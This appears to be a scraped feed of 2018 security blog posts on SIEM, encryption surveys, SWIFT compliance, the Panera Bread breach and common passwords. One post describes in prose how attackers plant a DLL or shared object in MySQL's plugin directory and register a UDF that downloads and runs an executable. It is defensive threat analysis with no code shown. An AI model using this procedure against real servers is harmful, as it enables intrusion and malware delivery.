It is important to promptly escalate any indication of a data breach to an incident response platform. At that point, an analyst will immediately begin to investigate the situation, analyze the root cause, reconfigure the security controls accordingly and endeavor to resume standard operations as quickly as possible. In cases where automated blocking is not acceptable, analysts can still minimize the response time by first confirming the incident and then invoking appropriate action directly from the incident response platform.

Automation can save security analysts a lot of time when responding to incidents, and time is crucial when dealing with a potential data breach. Organizations that have comprehensive, well-defined incident response checklists and deploy a wide range of tightly integrated tools will be in the best position to spring into action when a data breach strikes.

Download the 2017 Gartner Magic Quadrant for SIEM

The post Breaking Down the Security Immune System: Proactive Database Protection Through SIEM Integration appeared first on Security Intelligence.

How to Comply with GDPR

In a little over a month – on May 25, to be precise – the EU’s General Data Protection Regulation (GDPR) will take effect, and if your company is not

The post How to Comply with GDPR appeared first on The Cyber Security Place.

Survey: Nearly Half of Organizations Have a Consistent Enterprise Encryption Strategy

Nearly half of organizations have an enterprise encryption strategy that is applied consistently across the entire organization, a new encryption survey revealed. Forty-three percent of respondents to Thales’ “2018 Global Encryption Trends Study” said their employer had an enterprisewide encryption plan in place for 2017. That’s up from 41 percent in 2016 and 37 percent in 2015.

Enterprise Encryption Strategy Adoption on the Upswing

Thales began tracking the evolution of encryption back in 2005. In the 13 years that followed, the firm observed a steady increase in organizations adopting an encryption strategy. The company reported a decline in companies with no such strategy or plan over the same period: Just 13 percent of respondents said they lacked a comprehensive encryption policy in 2017, down from 15 percent two years prior.

Not all survey participants reported having a consistent plan across the entire organization, but the percentage of professionals with a limited enterprise encryption strategy didn’t change from 2016. Forty-four percent of respondents said their organization had a limited approach in both 2016 and 2017, which is up from just a quarter of individuals in 2015.

IT Security Spending on the Rise

For the study, Thales commissioned the Ponemon Institute to survey 5,252 individuals across industry sectors in the U.S., U.K. and 10 other countries. Their responses provided the company with insight into how enterprises’ use of encryption has evolved.

Their answers also illuminated how much budget employers are allocating to encryption and IT security. The former declined slightly from 14 percent in 2016 to 12 percent in 2017. At the same time, organizations spent approximately 10 percent of their overall IT spending on security, a percentage that marked a record high in a 13-year upward slope.

The report indicated some areas where both encryption and security spending could grow. One of them was cloud, with 21 percent of professionals expecting their organization to transfer sensitive or confidential data to the cloud within the next year or so. That’s in addition to the 61 percent of respondents who already do so.

Human Error an Ongoing Risk to Data

The Thales survey revealed that employee mistakes weighed heavily on respondents’ minds. Forty-seven percent of professionals cited human error as the most salient threat to sensitive or confidential data, followed by system or process malfunction and cybercriminals at 31 percent and 30 percent, respectively.

To protect against employee mistakes, organizations should balance technical controls with training that helps employees take responsibility for their actions.

The post Survey: Nearly Half of Organizations Have a Consistent Enterprise Encryption Strategy appeared first on Security Intelligence.

How to Tune Your Database Security to Protect Big Data

As digital information and data continues to accumulate worldwide, new big data solutions grow more and more popular. The introduction of IoT into our lifestyle, which turns appliances into smart data logging machines, along with organizations tracking behaviors for data science and research purposes, has made the move into big data storage inevitable.

Non-relational databases provide us with volume, velocity, variety and veracity, making it the perfect solution for storing huge portions of complex data without the overload in computing power and the high costs. Moreover, the wide selection of stable and trusted big data solutions, make it an accessible option for virtually everyone. This is all well and good, but when the stored big data is sensitive or private it requires protection, and whereas big data solutions grow rapidly popular, the public understanding of big data security is lagging, leaving tremendous amounts of data exposed.

When it comes to relational databases, which have been around since the 70s, data security has already become a standard approach with common practices, security protocols and solutions that cover almost every breach. Big data should be no different, as it is facing the same threats of external breaches, malicious insiders, and compromised insiders. So how do we take the trusted, successful data security methods used on RDBMS, and render them compatible with big data servers? How can we close the gap between big data servers’ demand, and the lacking security measures used to protect them?

Discovery: taking control of data

One of the many advantages of big data is its ability to spread out on distributed environments, in order to maximize the available computing power and to allow data backup. The downside is that many organizations and companies can’t even tell which of their servers contain big data clusters.

As a first step, a discovery process should be performed which is used to signal out which of the servers contain big data. The discovery process allows IT teams to find unknown databases by scanning the enterprise networks. Moreover, database discovery should be automated and configured to scan specific network segments on demand or at scheduled intervals.

An additional aspect of the discovery process is to be aware of the services the organization uses to approach big data. Services such as Hive or Impala, which can read and write big data function as a doorway to it, and as such should be protected against infiltration of malicious parties.

Classification: identifying sensitive data

The discovery process of big data clusters most likely left us with the mapping of huge amounts of data, but not all of it is sensitive and requires protection. In fact, attempting to monitor all of the information will lead to excessive costs and redundant efforts. To avoid these, the next step will be to classify which part of the discovered information is sensitive and requires protection.

The term sensitive information not only refers to trade secrets the organization wishes to keep to itself, but also includes data that is defined as sensitive by regulations, such as medical information, financial information, private identity details, and more. In order to comply with these regulatory requirements, the organization must know which parts of its big data clusters are considered sensitive.

The data classification process tags data according to its type, sensitivity, and value to the organization if altered, stolen, or destroyed. Upon its completion, the organization understands the value of its data, whether the data is at risk, and which controls should be implemented in order to mitigate risks. Data classification also helps an organization to comply with relevant industry-specific regulatory mandates such as SOX, HIPAA, PCI DSS, and GDPR.

Assessment: detecting database vulnerabilities and misconfigurations

At this point, the organization is aware where the sensitive information resides, assessment of its current security status can be performed. This process informs teams where the organization stands today in terms of utilizing the protection tools already available. Following a predefined checklist, the security items on the list are marked and checked if used correctly and which of them are not used or can be used better.

The assessment process is an automated test which is able to detect database vulnerabilities and misconfigurations such as default passwords and required version updates. To achieve maximum security results, this process should use pre-defined vulnerability tests, based on CIS and DISA STIG benchmarks that are updated regularly.

Once the assessment portion is complete, detailed reports need to be produced, including recommended remediation steps that will help the organization to maximize data security using his available resources.

Monitoring: audits, alerts and reporting

Once the assessment process has been completed successfully, the organization knows that the data is secure for the time being. But how can it be protected from future breaches? How can this security status be maintained in the future?

This needs to be done by tightly monitoring the sensitive information in order to achieve three goals:

  • The first one is to have an audit trail, which logs all actions performed on the sensitive data and the people performing these actions. This will be useful for forensic investigation purposes, if a breach occurs, and will help to comply with regulatory policy.

The audit trail provides complete visibility into all database transactions, including local privileged user access and service accounts. It also continuously monitors and audits all logins/logouts, updates, privileged activities and more.

  • The second is alerts. Dynamic profiling can automatically build a whitelist of the data objects regularly accessed by individual database accounts. Admins can create policies that generate an alert when a profiled account attempts to access a data object that is not whitelisted.
  • And last is reporting. All monitored data, including alerts, is logged and can be accessed at any time for reporting purposes.

Analytical insights: building behavioral patterns and detecting anomalies

Every piece of information logged and audited by the monitoring tools is gathered and saved. Once enough data has been accumulated, it needs to be processed in order to create individual and organizational behavioral patterns.

This process utilizes machine learning to automatically uncover unusual data activity, surfacing actual threats before they become breaches. How? It first establishes a baseline of typical user access to database tables and files, then detects, prioritizes, and alerts on abnormal behavior. Moreover, it gives the ability to analyze the data access behavior of particular users with a consolidated view of their database and file activity, investigate incidents and anomalies specific to the individual, view the baseline of typical user activity, and compare a given user with that user’s peer group.

Once these are established, the highest risk users and assets need to be spotlighted so the data security team will prioritize the most serious data access incidents, investigate events by filtering open incidents by severity, then take a deeper look into specific incident details about the user and the data that was accessed.

Achieving a successful security process, including the steps mentioned above, can be a daunting task when you are using insufficient tools and protocols. That is why Imperva developed SecureSphere, one unified security platform that monitors and protects all enterprise data, managed using a single pane of glass. The combination of SecureSphere, along with CounterBreach, Imperva’s behavioral analytics solution which detects risky data access behaviors, will provide you with maximized security for your big data.

Facilitating Stronger Data Protection and Partner Collaboration With Guardium 10.5

Many organizations struggle to manage unstructured data, and these challenges will only continue to grow. As we know, data volume is expected to increase tremendously over the next five to 10 years, and much of that growth will consist of unstructured data. It is crucial to understand this data in the context of security and privacy, especially given impending regulatory deadlines.

Beyond the security and compliance challenges that unstructured data poses, there is also the broader challenge of protecting both structured and unstructured data, wherever it resides and regardless of platform, in the face of the evolving threat landscape. It is well-known in the cybersecurity world that cybercriminals often work together in groups, collaborating to leverage their collective skills and amplify the impact they have.

Those of us who are dedicated to using our powers for good ought to do the same. Working together to improve our data protection capabilities is a good place to start.

Introducing IBM Security Guardium Data Protection v10.5

IBM Security Guardium is a suite of products designed to safeguard critical data wherever it resides. In an age when data growth is explosive and risks to personal and sensitive information lurk around every corner, having this capability across all environments and data sources is critical to business success.

Today, IBM announced the release of IBM Security Guardium Data Protection v10.5, which features new capabilities designed to help clients with the challenges outlined above.

Discovery and Classification for Unstructured Data Across More Platforms

As of v10.5, Guardium Data Protection for Files now supports discovery and classification for unstructured data across network-attached storage (NAS), Sharepoint, Windows and Unix platforms. This allows clients to gain a more cohesive understanding of where their unstructured at-risk data lies and what type of data it is, which helps them support compliance with various regulatory mandates and establish a strong foundation for an effective enterprise data security program.

Expanded Partner Ecosystem for Data Security and Open Access for Integration

As part of this new release, Guardium is providing open data security integration points with applications developed by technology and business partners hosted in the new Guardium App Exchange. To help these partners build value-added data security applications that leverage or extend Guardium’s existing capabilities, Guardium now also provides a software development kit (SDK).

By facilitating collaboration to expand the data security ecosystem, IBM aims to make it easier for those with an interest in data security to work together to help protect sensitive data in new ways. This enables security teams to implement specialized technologies, niche data platforms and experimental interfaces to expand upon Guardium’s existing integration points and core capabilities while also improving usability for a wider range of people.

Get Started Today

There are many resources to help organizations get started with the new Guardium SDK and begin contributing to the App Exchange, most notably the DevCenter for high-level help and resources and the Knowledge Center for technical enablement. To download the SDK now, visit the App Exchange.

On May 17, we will be hosting a Tech Talk where you can learn about these capabilities and more. You can register here.

The post Facilitating Stronger Data Protection and Partner Collaboration With Guardium 10.5 appeared first on Security Intelligence.

Cybersecurity: How Do You Build a Transformational Dynamic?

At the end of a keynote speech I gave at the excellent CIO WaterCooler LIVE! Event in London on 28th September 2017 on security organization, governance and creating the dynamics

The post Cybersecurity: How Do You Build a Transformational Dynamic? appeared first on The Cyber Security Place.

Biometrics in the workplace: what about consent and legitimate interest?

How can organizations processing biometric data for workplace security or fraud prevention use cases ensure that they are compliant with requirements within the General Data Protection Regulation (GDPR)? This article

The post Biometrics in the workplace: what about consent and legitimate interest? appeared first on The Cyber Security Place.

Strengthening Cybersecurity’s Weakest Links With Deep Network Insights

Like a chain forged of steel, cybersecurity is only as strong as its weakest link. But how can we gain visibility into where these weaknesses exist and how they are being exploited? How can we determine where gaps occur that impact our ability to protect against, detect and respond to the latest threats?

Studies have shown the vast majority of cyberattacks take place using our networks — which isn’t surprising in our hyperconnected world. Comprehensive visibility into the activity on our networks can provide deep network insights into not only what is occurring across our organizations, but also where we are potentially exposed.

Identifying Weak Links in the Cybersecurity Chain

People are the weakest link in the proverbial cybersecurity chain. Social engineering can provide easy access to even our most sensitive assets. Let’s say, for example, a person with valuable information, access or authority is targeted by a spear-phishing attack. It could be someone in the IT department, one of your executives — or any employee who could be used as a stepping stone to gain further access or information.

Jose Bravo, North America security architect at IBM, recently published a video to demonstrate how a human resources manager might fall victim to such a scheme by merely opening the wrong attachment, clicking the wrong link, or (as the video shows) unblocking content and allowing a document to update links. Even with proper security training, it is often relatively easy for fraudsters to trick employees into taking these actions, especially when they resemble tasks they repeatedly perform throughout their day.

There are also less direct ways in which humans represent the weakest link in security. I have yet to find a cybersecurity team that is not short-staffed and overworked. All it takes is a simple mistake, such as misconfiguring a network device, leaving the wrong port open or failing to enable logging everywhere visibility is needed. Even if everything is set up correctly, a mundane change could have unintended consequences and leave networks exposed.

So, how can we gain visibility into areas where we may be exposed and times during which we are most susceptible to being exploited? Can we gain enough insight into these weak links to take proper corrective action?

Unlocking the Power of Deep Network Insights

This is where the power of deep network insights can help. Basic network flow analysis can detect a new device connecting to the network, even if it doesn’t log any activity. In addition to detecting these devices, the right security information and event management (SIEM) solution can automatically add them to the list of known assets so that they can benefit from the same security analytics as properly configured devices.

But deep network insights enable security teams to go well beyond simply detecting devices and their communications. When malicious actors try to disguise their activity by misusing standard ports and protocols, deep analysis of the real applications allows security professionals to shed light on the true nature of what is occurring. If sensitive data is subsequently accessed, application-specific content analysis can provide the proper visibility to quickly identify and protect the valuable data our organizations rely on every day.

In this way, the very networks that expose our weaknesses to adversaries also provide us with the visibility we need to properly defend our sensitive data. The key is simply to look deep enough.

The post Strengthening Cybersecurity’s Weakest Links With Deep Network Insights appeared first on Security Intelligence.

Nearly Half of Organizations Targeted Again Within a Year of Suffering a ‘Significant’ Cyberattack, Report Reveals

Nearly half of organizations that suffered a “significant” digital attack fell victim to bad actors again within a year’s time, a new security trends report revealed.

According to Mandiant’s “M-Trends 2018” report, 49 percent of managed detection and response customers that remediated a large-scale attack suffered an incident from the same or a similarly motivated threat group within one year. The initial assaults consisted of data theft, credential harvesting and spear phishing, among other techniques.

Unpacking Repeat Cyberattack Trends

Mandiant admitted to not having looked at recompromise figures since it released its “M-Trends 2013” study five years ago. That report found that 38 percent of clients had suffered another attack after successful remediation.

The number of follow-up attacks were somewhat higher in 2017: 56 percent of customers weathered at least one significant attack from the same threat group or one like it. At the same time, the vast majority (86 percent) of organizations that remediated more than one significant cyberattack hosted more than one unique bad actor in their IT environment.

Some regional differences were apparent over the course of the year. Less than half of customers in the Americas and Europe, Middle East and Africa (EMEA) experienced another attack of consequence and/or multiple threat actors. By contrast, 91 percent of Asia-Pacific (APAC) clients dealt with a subsequent campaign, while 82 percent of organizations from that region suffered a significant attack from multiple groups.

The Good News and Bad News About Dwell Time

Dwell time, or the average number of days during which attackers lurked in a victim’s network prior to detection, increased across several regions in 2017, according to the report. The APAC average increased nearly three times, from 172 days to 489 days. The EMEA dwell time growth was more modest at 40 percent, from 106 days to 175 days.

Stuart McKenzie, vice president of Mandiant at FireEye, expressed disappointment in the growth of the median EMEA dwell time but noted that it’s not all bad news.

“On the positive side, we’ve seen a growing number of historic threats uncovered this year that have been active for several hundred days,” McKenzie said, as quoted by Infosecurity Magazine. “Detecting these long-lasting attacks is obviously a positive development, but it increases the dwell time statistic.”

During the same survey period, the dwell time for the Americas decreased from 99 days to 75.5 days. The average across all regions rose slightly from 99 days to 101 days.

Looking Ahead

In the report, Mandiant shared its prediction that foreign digital espionage groups will continue to prey upon U.S. companies and service providers in 2017. It also predicted that bad actors will target the software supply chain to spy on developers and software-makers over the course of the year.

The post Nearly Half of Organizations Targeted Again Within a Year of Suffering a ‘Significant’ Cyberattack, Report Reveals appeared first on Security Intelligence.

Encryption an increasingly popular solution among organisations

Saves against human error, data theft or compliance issues.Organisations are turning towards encryption to keep their data safe, new reports from Thales are saying. The critical information systems company issued

The post Encryption an increasingly popular solution among organisations appeared first on The Cyber Security Place.

A Deep Dive into Database Attacks [Part IV]: Delivery and Execution of Malicious Executables through SQL Commands (MySQL)

In a previous post we covered different techniques for execution of SQL and OS commands through Microsoft SQL server that can be used for delivering and executing malicious payloads on the target system. In this post we’ll discuss the same topic for MySQL database.

Creating an executable directly on MySQL server via SQL commands

In the one of the previous posts (link to part I) we mentioned that HEX encoded queries are often used against databases as binary-to-hex conversion methods to create a payload on a target system through SQL commands. A payload is converted from hexadecimal format back to a binary executable, and then gets executed while exploiting different database and operating system features through SQL commands.

We observed the following methods to create and execute executables on MySQL servers’ filesystem:

 Method 1 – via SQL execution

The following example demonstrates a method to create and execute a dynamic-link library (DLL) or a Linux shared object (SO) on a MySQL server – without having direct access permissions to disk:

This attack (which is not new) loads a DLL (which converted to HEX string) into a newly created table yongger2 (“yongger” translates from Chinese as “brave”). This attack then uses the SELECT FROM TABLE… INTO DUMPFILE command to extract the DLL from the new table into the cna12.dll file in MySQL plugin directory. This method works if the plugin directory (the directory named by the plugin_dir system variable) is writable.

Once the DLL is created, MySQL server’s main process (mysqld) is notified about a new xpdl3() function using the CREATE FUNCTION command. This function is a downloader for another executable. It downloads the executable 123.exe through an HTTP request from a remote server (located in China). Then 123.exe is saved as c:\isetup.exe on a target filesystem, executed and then removed from the disk.

The following figure summarizes this attack method:

Figure 1: Technique to create DLL and execute its function using SQL commands

Figure 1: Technique to create DLL and execute its function using SQL commands

Method 2 – via operating system execution

The following example demonstrates a method of writing a binary shared object (SO) directly on a filesystem to MySQL plugin_dir:

The attack steps are as follows:

  • HEX encoded shared object is decoded by the UNHEX function to a binary format and then dumped into a file
  • Set the global log_bin_trust_function_creatorssystem variable to 1 to relax the preceding conditions on function creation (you must have the SUPER privilege and that a function must be declared deterministic or to not modify data)
  • Create sys_eval user-defined function (UDF) from shared object (so)
  • Call sys_eval function which is instructed to download an executable from the attacker’s server (using cURL[1]), change the executable’s permissions to full access (chmod 777) and execute it
Figure 2: Technique to create Shared Object on Linux OS and execute its function using SQL commands

Figure 2: Technique to create Shared Object on Linux OS and execute its function using SQL commands

Download executables to MySQL server via SQL commands

In Mysql database, User-Defined Function (UDF) remains one of the few methods available for running commands on the server through the database.It is supported as a function loaded from an external library, such as DLL or Linux shared object. We’ll describe the method in detail in our next blog in the series.

After attacker uploads or creates an external library on server’s file system, they can execute its functions. Formerly, the attacker abuse UDF functions to download a malicous executables from a remote server.

The following are examples for this technique:

Summary

In this post we covered various methods for executing SQL and OS commands through MySQL database, which can be used to deliver and execute malicious payloads on a targeted system. With the next post in this series, we’ll describe techniques engaged by attackers to perform external and internal reconnaissance and to increase the attack surface.

[1] cURL is a computer software project providing a library and command-line tool for transferring data using various protocols.

Streamline Compliance with SWIFT Customer Security Program Requirements

Transferring money from our bank accounts has never been easier than it is today. With a single click on our smartphones, we can transfer money from a bank account in New York to an account at a different bank in the Netherlands.

This advancement is largely a result of the fluent communication between banks around the world, facilitated by SWIFT, the Society for Worldwide Interbank Financial Telecommunication.

Founded in 1973, SWIFT is an organization providing banks and financial institutes worldwide with a communications network allowing them to execute financial transactions in a secure and standardized method. Over time, SWIFT has become synonymous with financial communications, so much so that the majority of the world’s financial institutions use it.

Technological progress aside, being the sole guardian of most of the world’s money as it’s transferred between institutions is a position that comes with great risk. As such, SWIFT has become a magnet for white-collar scams and hackers preying on the biggest money highway in the world. The past two years alone have seen at least three successful attacks on SWIFT servers, while unsuccessful ones are carried out daily by hackers around the world.

In 2016, using SWIFT credentials, hackers were able to steal $81 million by sending a dozen transfer requests to the Federal Reserve Bank of New York, asking to transfer millions of dollars out of the Bank of Bangladesh’s funds and into different accounts in the Far East.

In November of 2017, hackers attacked the SWIFT servers of a Nepalese bank, stealing a total of $4.4 million and moving them to the US, UK and Japan using fraudulent SWIFT messages. Only a month later, hackers attempted to steal 55 million Rubles from the Russian state bank Globex using the same method. They were actually stopped and only managed to steal about $100,000.

The influx in hacking attacks on SWIFT didn’t happen in a void. It is a direct result of the technological advances hackers have made and the growing sophistication of their methods. And when it comes to SWIFT, which is handling trillions of dollars daily, hackers go out of their way to succeed.

Due to these latest attacks, SWIFT called out to its more than 11,000 linked financial institutions to reinforce a Customer Security Program (SWIFT CSP) by December 31, 2018. The program contains a number of mandatory protection methods, which all SWIFT organizations must enforce by the deadline.

Lowering Risk, Increasing Security

To meet the aggressive deadlines, and effectively implement a SWIFT CSP compliance program, many organizations are turning to third-party security solutions that can assist and automate monitoring and protection of vulnerable systems.  Below is a list of SWIFT CSP requirements and some examples of how third-party solutions can help to protect databases and data flow.

SWIFT Environment Protection

SWIFT requires all members to ensure the protection of the user’s local SWIFT infrastructure from potentially compromised elements that originate in the general IT environment or external environment surrounding the SWIFT server.

For database infrastructure, a robust database firewall will provide the solution for this requirement, by functioning as a buffer between the SWIFT system and connected database components, preventing unauthorized access to relevant data records.

Internal Dataflow Security

This requirement is meant to guarantee the confidentiality, integrity, and authenticity of data flows between the local SWIFT-related applications and their link to the operator PC.

One way this requirement could be met is to deploy a web application firewall (WAF) to secure the connection between the user’s PC and the local SWIFT application (if web-based) to block unauthorized access.

Security Updates

SWIFT urges its members to minimize the occurrence of known technical vulnerabilities within the local SWIFT infrastructure by ensuring vendor support, applying mandatory software updates, and applying timely security updates aligned to the assessed risk.

Organizations wishing to follow this requirement can do so by setting up a system that supports vulnerability assessments for databases in the SWIFT environment. This way members can ensure that the most recent security updates are installed on the operating system and the database.

Password Policy

According to the CSP, members must ensure passwords are sufficiently resistant against common password attacks by implementing and enforcing an effective password policy.

It’s important that the password policy is applied consistently within all the applications of an organization’s SWIFT infrastructure.  As a best practice, many organizations use security solutions to help them ensure the policy is followed by actively scanning to identify and alert them of policy violations such as the use of weak passwords that could compromise the security of the network.

Logical Access Control

SWIFT requires members to enforce the security principles of need-to-know access, least privilege, and segregation of duties for operator accounts.

To meet this requirement, organizations can often use capabilities built into their software to establish user roles and access control lists.  However, this too should be continuously monitored for compliance and is best done by deploying a security solution that detects and alerts them on attempts to breach system privileges.

Logging and Monitoring

All members of the SWIFT network must utilize a logging system that is able to record activity such as system logins, user IDs, network IPs, messages sent, message recipients, transaction details, and other information – then establish procedures to continuously monitor the system.

Many organizations lack the resources and skills to effectively analyze real-time events or search through massive amounts of log data and identify which log entries might indicate a threat or breach.  Security monitoring tools can help automate the process using machine learning and artificial intelligence, filtering out “noise” while quickly identifying events that could indicate a serious risk and sending immediate notification or stopping the activity.

Cyber Incident Response Planning

To adhere to the CSP terms, members are required to activate a consistent and effective approach for the management of cyber incidents.

This is a procedural requirement that requires ongoing management that can be time consuming and costly.  Organizations can greatly simplify the process and reduce costs by using  solutions that  automate the process, monitoring activity by policy, and identifying, detecting and alerting on risks, and helping stop potential breaches in real time.

Shortening the SWIFT Compliance Process

Organizations and institutions wanting to ensure their place on the SWIFT white list can use third-party solutions to simplify SWIFT CSP compliance. Imperva solutions provide organizations with solutions that will lighten the load, saving the organization precious time and effort.

Imperva SecureSphere provides a unified security platform that monitors and protects applications, data flows and databases. SecureSphere provides options for a Web Application Firewall (WAF), Database Vulnerability Assessment and Monitoring, and a Database Firewall (DBF).

A combination of SecureSphere and CounterBreach, Imperva’s behavioral analytics solution that detects risky data access behaviors, will provide maximized security for financial institutions seeking compliance for inclusion in the SWIFT network.

Related Posts

4 Steps to Monitor and Audit Privileged Users of Data Stores

The Evolution of Cybercrime and What It Means for Data Security

Less Than 30 Percent of IT Security Executives Can Prevent Ransomware Attacks, Survey Reveals

Less than 30 percent of IT security executives who responded to a recent survey reported that they would be able to prevent large-scale ransomware attacks.

Despite this, SolarWinds MSP’s new report, “The 2017 Cyberattack Storm Aftermath,” found that IT security executives have a high level of knowledge of crypto-malware. More than two-thirds (69 percent) of respondents said they were deeply familiar with ransomware attacks such as WannaCry, which infected hundreds of thousands of endpoints within 48 hours earlier in May 2017, and Petya, which affected systems in dozens of countries in June 2017.

This familiarity led approximately three-quarters of survey participants to rate the risk of both WannaCry and Petya as very high, but it didn’t translate to better protection against this type of incident. While most respondents indicated that they would be able to detect WannaCry (72 percent) and Petya (67 percent), only 28 percent and 29 percent, respectively, said they would be able to prevent these attacks.

Organizations Struggle to Curb Ransomware Attacks

For the survey, SolarWinds MSP commissioned the Ponemon Institute to speak to 202 senior-level IT security executives in the U.S. and U.K. about some of the most high-profile threats that emerged in 2017. Their responses revealed that enterprises could be doing more to protect against these widespread attacks.

For example, just one-quarter of respondents said their organization employs specialists who possess the necessary expertise to defend against ransomware and other threats. Meanwhile, one-third admitted that their employer doesn’t have any specialized personnel on the payroll and doesn’t consult with external experts.

Many of these problems can be attributed to lack of resources. Less than half of survey participants reported having sufficient technology to prevent, detect and contain significant threats, and 48 percent said their organization’s IT security budget was inadequate.

Patching and Basic Security Hygiene

Tim Brown, vice president of security architecture at SolarWinds, said the best way for organizations to close these gaps and protect themselves against ransomware is to apply software patches.

“People often don’t think of basic security hygiene as one of the most important things they need to do, but it really is — although it’s really not easy,” Brown told Infosecurity Magazine. “Doing the basics well is not ‘sexy’ or ‘cool,’ it’s a lot of hard work that needs to get done, but no technology is going to really save you from that hard work.”

For companies that lack the necessary resources to fulfill those security basics, Brown suggested contracting security functions to a managed services provider (MSP).

The post Less Than 30 Percent of IT Security Executives Can Prevent Ransomware Attacks, Survey Reveals appeared first on Security Intelligence.

Panera Bread’s half-baked security

We’ve heard it all before. XYZ Company “takes your data security very seriously.”

Most commonly you’ll hear these words just after a company has suffered an embarrassing data breach, perhaps having carelessly exposed the personal information of innocent customers onto the net or had a database stolen by hackers.

The truth is that it’s a brave organisation which promises it will never suffer a serious security incident. Accidents can happen, human weaknesses can leave open vulnerabilities which hackers may be able to exploit, partners who work alongside your company may have had their own security fail which impacted your business.

In these instances, the only way to recover your customers’ trust and retrieve your company’s reputation from being tarnished too much is to respond appropriately to the incident. Often, in fact, the response to a security breach will be more critical to your company’s brand than the incident itself.

And, if you want an example of a company that has got it massively wrong look no further than Panera Bread, the North American chain of over 2000 bakery cafés.

If you visit Panera Bread’s website today, you won’t find the usual collection of sandwiches, soups, salads, and sausage rolls. Instead you’ll probably see a message like this:

Panera Bread’s website is down. In fact, it’s the second time it’s been down in the last couple of days. Let me explain why…

In August 2017, a security researcher called Dylan Hoilihan privately informed Panera Bread of a serious security vulnerability on the delivery.panerabread.com website, which meant that details of any signed-up customers’ full names, email addresses, phone numbers, and the last four digits of their saved credit card numbers could be scooped up.

A member of Panera Bread’s information security team responded to Houlihan, seemingly skeptical of the report – believing it to be a scammy sales pitch.

After a few days and some to-and-fro (which you can read on Houlihan’s blog post), Panera Bread confirmed it was working on resolving the issue.

That was back in August 2017.

As each month passes, Houlihan investigates whether the Panera Bread security vulnerability still exists – and, sadly, it does.

And so, eight months later and frustrated by the lack of response, he informs security blogger Brian Krebs who publicly reveals that millions of customer records are at risk.

Before publishing details of the problem, Krebs spoke to Panera Bread’s CIO John Meister, and the website was soon afterwards briefly taken down for “essential system maintenance”.

Krebs, no doubt, assumed that the problem was being resolved. But no explanation was made as to why no fix was put in place back in August 2017, when they were first informed of the problem by Houlihan.

And if you think that’s bad, things get worse…

Panera Bread told Fox News that “fewer than 10,000 consumers have been potentially affected by this issue” and that “this issue is resolved”.

However, within minutes of that claim it became apparent that the same vulnerability was *still* present on the website – and that the number of customer records exposed may total over 37 million.

And that’s why Panera Bread’s website is down again.

Let’s hope it is taking data security seriously now. Although wouldn’t it have been much better if the company had taken decisive action when the issue was first reported to them eight months ago?

‘Tiger’ Named the Most Common Password Related to a Sports Team

Security researchers recently claimed that “Tiger” is the most common password relating to sports teams and mascots.

To coincide with the annual NCAA Division I men’s basketball tournament, Keeper Security published a bracket of some of most commonly used sports-related passwords. Among them, “Tiger” and its variations, such as “T1ger” and “T1g3r,” came out on top.

What’s the Most Common Password Related to Sports?

According to a press release, “Tiger” was 850 percent more common than “Bluejay,” the password that appeared least frequently. It was also 187 percent more common than “Eagle,” the runner-up for first place.

Some of the other credentials that appeared in Keeper Security’s bracket were “Bulldog,” “Gator, “Cardinal,” “Wildcat” and “Hurricane.”

Keeper Security's bracket for sports-themed passwords that are commonly leaked
Source: Keeper Security

To create this bracket, Keeper Security used a file of compromised credentials uncovered by security firm 4iQ that included 1.4 billion passwords, according to a 4iQ blog post. All of these credentials were in cleartext, meaning that anyone could easily access them.

A Call for Better Account Security

Darren Guccione, CEO and co-founder of Keeper Security, said his company’s bracket reflects the fact that users continue to opt for convenience over security when choosing a password.

“People often choose their passwords based on something they can easily remember,” explained Guccione. “But those are the easiest passwords for hackers to crack. Since most people reuse the same password more than 80 percent of the time, this can compromise consumers’ banking, retail and social media accounts.”

Attackers don’t even need to steal those credentials from improperly secured databases or buy them from underground marketplaces. They can simply brute-force their way into users’ accounts by building and deploying a password cracking tool.

While Keeper’s password bracket is all in good fun, it also illustrated the need for users to embrace better account security practices. They can do so by adopting authentication solutions such as biometrics and by following the recommendations of enterprise security teams. Most will advise users to avoid simple keystroke combinations, stay away from common dictionary words and create unique passwords for each account.

The post ‘Tiger’ Named the Most Common Password Related to a Sports Team appeared first on Security Intelligence.

Emerging Trends in Information Technology: Focus Shifts to Device Disposal as Hardware Spending Increases

Company spending on hardware is trending up. That’s the word from a recent Spiceworks survey that analyzed emerging trends in information technology. According to the report, 44 percent of businesses expect to boost IT budgets through 2018, with 31 percent of funds allocated for new hardware.

Study Examines Emerging Trends in Information Technology

The Spiceworks study found that enterprises are spending more on desktops, laptops, servers and networking hardware. End of life (54 percent) and increased growth (53 percent) drive the bulk of these new hardware purchases. This is a marked departure from recent years, which saw both shrinking IT departments and trends toward rented resource consumption over physical investment.

But as end-user expectations increase and mobile devices become essential to business’ bottom lines, companies can’t put off hardware purchasing until it’s more convenient — spending is a requirement to stay competitive. According to Network World, double-digit growth is in the cards for hardware purchasing this year, with investment firm Morgan Stanley upgrading its view of the market from “cautious” to “attractive.”

More Endpoints, More Problems

More hardware means more endpoints and, ideally, improved corporate efficacy. It also drives increased risk since network devices, desktops and laptops leverage technology that may be susceptible to threats.

While emerging trends in information technology still include a focus on securing applications and detecting software threats, there’s also a need to securely handle and dispose of old hardware. Simply tossing or recycling old devices creates a potential attack avenue for cybercriminals. Individuals who manage to get their hands on decommissioned hardware that hasn’t been properly severed from corporate networks could initiate a breach that would seemingly originate from approved devices.

There’s also the problem of existing structure. Malicious actors with the ability and time to examine ditched devices could uncover common hardware components that are vulnerable to well-known threats and then apply this knowledge to corporate infrastructures at large.

Properly Disposing of Old Hardware

According to TechRepublic, companies “must standardize their procedures for decommissioning and disposing of old IT hardware as part of their comprehensive data security protocol.” Tossing hardware isn’t fire-and-forget — devices must be properly disconnected, wiped for critical data, and then securely recycled or disposed of in a way that prohibits reconstruction and information mining.

With IT budgets on the rise and new hardware atop the spending list, enterprises must secure devices as they’re deployed, while they’re in use and during decommission.

The post Emerging Trends in Information Technology: Focus Shifts to Device Disposal as Hardware Spending Increases appeared first on Security Intelligence.

Know Your Security X’s and O’s: Your Cyberdefense Team Is Only as Good as Its Threat Intelligence

All of us in the security industry realize that we face a virtually insurmountable task to ensure that the data belonging to our organizations and customers is kept safe and secure. If you step back and think about it, the list of potential perpetrators is daunting in scope. It includes cybercriminals, hacktivists, foreign governments, and both malicious and negligent insiders. Not only are they persistent, but they also work together like a well-oiled college basketball team determined to cut down the nets — except cybercriminals are working toward the singular goal of gaining illegal access to data.

Threat Intelligence: The X’s and O’s of Security

